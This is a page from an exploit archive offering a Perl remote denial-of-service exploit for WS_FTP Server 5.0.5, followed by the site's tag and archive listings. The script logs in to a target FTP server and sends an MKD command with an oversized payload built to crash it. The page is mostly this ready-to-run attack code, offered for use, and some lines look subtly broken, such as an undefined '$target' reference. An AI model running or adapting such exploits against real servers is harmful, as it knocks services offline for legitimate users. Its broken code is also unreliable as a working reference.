Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- WS_FTP Server 5.0.5 Denial Of Service[6]
- Authored by Fernando Mengali[7]
-
WS_FTP Server version 5.0.5 remote denial of service exploit.
- SHA-256 |
b0ae7d2a65c936ec4e7b7587622a4bd90c91fed914ec8e7ea7930992434fb955
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/perl
use IO::Socket::INET;
# Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 30 january 2024
# Vendor Homepage: N/A
# Notification vendor: No reported
# Tested Version: 5.0.5
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denied of Service (DoS)
#1. Description about vunerability and exploited
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit we intentionally increased the number of bytes sent to the server to process.
#We concluded that the FTP server does not correctly manage the amount of data or bytes sent and processed, causing denied service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
my $exploit = "\x41"x676;
$exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e";
$exploit .= "\x42"x3000;
$exploit .= "\r\n";
my $sock = IO::Socket::INET->new(
PeerAddr => $target->$ip,
PeerPort => $target->$port,
Proto => 'tcp',
) or die "Not connect to $ip:$port: $!";
my $response = <$sock>;
print "Connected => $response";
$sock->send("USER $ftp_user\r\n");
$response = <$sock>;
print "Authentication USER: $response";
$sock->send("PASS $ftp_pass\r\n");
$response = <$sock>;
print "Authentication PASSWORD: $response";
$sock->send("MKD ".$exploit);
$response = <$sock>;
print "Exploited : $response";
sub intro {
print q {
---------- # ------------------------------------------------------------------
--------- ##= ------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) -------
-------- ##=== ----------------------------------------------------------------
------ ###==#=== --------------------------------------------------------------
---- ####===##==== ------------------------------------------------------------
-- #####====###===== ----- Coded by Fernando Mengali -----
- #####=====####===== -----Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. -----
- #####=====####===== ---------------------------------------------------------
--- ####= # #==== -------- Prepare to exploiting the server ------------
--------- ##= -----------------------------------------------------------------
------- ####=== ---------------------------------------------------------------
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,957)
- Arbitrary[20] (16,510)
- BBS[21] (2,859)
- Bypass[22] (1,810)
- CGI[23] (1,031)
- Code Execution[24] (7,521)
- Conference[25] (685)
- Cracker[26] (843)
- CSRF[27] (3,365)
- DoS[28] (24,228)
- Encryption[29] (2,377)
- Exploit[30] (52,462)
- File Inclusion[31] (4,241)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,819)
- Intrusion Detection[35] (903)
- Java[36] (3,111)
- JavaScript[37] (884)
- Kernel[38] (6,901)
- Local[39] (14,629)
- Magazine[40] (586)
- Overflow[41] (12,942)
- Perl[42] (1,429)
- PHP[43] (5,167)
- Proof of Concept[44] (2,359)
- Protocol[45] (3,677)
- Python[46] (1,585)
- Remote[47] (31,194)
- Root[48] (3,610)
- Rootkit[49] (517)
- Ruby[50] (615)
- Scanner[51] (1,646)
- Security Tool[52] (7,949)
- Shell[53] (3,224)
- Shellcode[54] (1,216)
- Sniffer[55] (898)
- Spoof[56] (2,236)
- SQL Injection[57] (16,468)
- TCP[58] (2,420)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,327)
- Web[63] (9,815)
- Whitepaper[64] (3,763)
- x86[65] (966)
- XSS[66] (18,088)
- Other[67]
File Archives
- January 2024[68]
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,058)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,954)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,425)
- HPUX[90] (880)
- iOS[91] (369)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,382)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (14,952)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,250)
- UNIX[105] (9,357)
- UnixWare[106] (187)
- Windows[107] (6,620)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]